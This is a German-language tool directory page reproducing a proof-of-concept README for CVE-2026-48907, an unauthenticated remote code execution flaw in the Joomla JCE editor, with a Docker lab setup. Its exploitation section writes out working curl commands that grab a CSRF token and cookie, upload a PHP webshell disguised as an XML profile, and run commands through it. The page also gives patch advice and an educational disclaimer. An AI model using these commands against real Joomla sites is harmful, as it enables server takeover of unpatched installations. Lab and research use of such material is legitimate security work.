Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-48907 — POC für CVE-2026-48907 | Kitploit
Tools/GitHubGitHub/pssec-io/cve-2026-48907
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & BildungPayload-EntwicklungLabs & Praxis
GitHubpssec-io/cve-2026-48907

CVE-2026-48907

POC für CVE-2026-48907

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-48907 — Joomla JCE Unauthenticated RCE Lab

PSsec Bildungs- und Sicherheitsforschungslabor für CVE-2026-48907.


Übersicht

CVE-2026-48907 ist eine kritische (CVSS 10.0) nicht authentifizierte Remote-Code-Ausführungssicherheitslücke in JCE (Joomla Content Editor), der am weitesten verbreiteten Editorerweiterung für Joomla, die alle Versionen ≤ 2.9.99.4 betrifft.

Der Endpunkt profiles.import akzeptiert Dateiuploads ohne Authentifizierung. Ein Angreifer kann eine bösartige PHP-Datei hochladen, die als XML-Profil getarnt ist, welche in das tmp/-Verzeichnis des Servers geschrieben und direkt über HTTP ausgeführt wird — keine Anmeldeinformationen erforderlich.

Tool herunterladen
DetailWert
CVECVE-2026-48907
CVSS Score10.0 Kritisch
Betroffene VersionenJCE ≤ 2.9.99.4
Behobene VersionenJCE ≥ 2.9.99.5
CISA KEV gelistetJa — 16. Juni 2026
Aktiv ausgenutztJa

Lab-Einrichtung

Voraussetzungen

  • Docker + Docker Compose
  • Kali Linux (oder ein beliebiger Linux-Host)

1. Starte die angreifbare Umgebung

root@kitploit:~
docker compose up -d

2. Schließe den Joomla-Installationsassistenten ab

Öffne http://localhost:8080 in deinem Browser und schließe den Installationsassistenten mit folgenden Anmeldedaten ab:

FeldWert
Database Hostdb
Database Namejoomla
Database Userjoomla
Database Passwordjoomlapass

3. Installiere die angreifbare JCE-Erweiterung

root@kitploit:~
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip

Dann im Joomla-Adminbereich: System → Erweiterungen → Installieren → lade die ZIP-Datei hoch.


Ausnutzung

4. CSRF-Token und Session-Cookie extrahieren

root@kitploit:~
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
  | sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
  | head -n1)

5. PHP-Webshell über nicht authentifizierten Profilimport hochladen

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  -F "[email protected];type=application/xml" \
  -F "task=profiles.import" \
  -F "${TOKEN}=1" \
  "$URL/index.php?option=com_jce"

6. Remote-Code-Ausführung bestätigen

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  "$URL/tmp/shell.xml.php?cmd=id"

Erwartete Ausgabe: uid=33(www-data) gid=33(www-data)


Dateien

DateiBeschreibung
docker-compose.ymlStartet angreifbares Joomla 5.3.1 + MySQL 8.0
shell.xml.phpMinimale PHP-Webshell-Payload
instructions.txtSchritt-für-Schritt-Ausnutzungshinweise

Abhilfe

Aktualisiere JCE sofort auf Version 2.9.99.5 oder höher.

Offizielle Herstellerberatung und kostenloser Patch für ältere Joomla-Versionen: JCE Security Update — joomlacontenteditor.net


Danksagungen

  • Exploit-Tool-Referenz: JoomlaSniper von ynsmroztas
  • Schwachstelle entdeckt in freier Wildbahn von Phil Taylor von mySites.guru
  • CISA KEV-Listung: 16. Juni 2026

Haftungsausschluss

Dieses Repository ist ausschließlich für Bildungs- und autorisierte Sicherheitsforschungszwecke gedacht.

Tests dürfen nur gegen Systeme durchgeführt werden, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Erlaubnis haben. Die unbefugte Nutzung dieses Materials gegen Systeme, die Ihnen nicht gehören, ist illegal und unethisch. Die Autoren und Pansophical OU übernehmen keine Haftung für Missbrauch dieses Inhalts.

Diese Laborumgebung ist absichtlich verwundbar. Setzen Sie sie nicht dem Internet oder einem nicht vertrauenswürdigen Netzwerk aus.


Von PSsec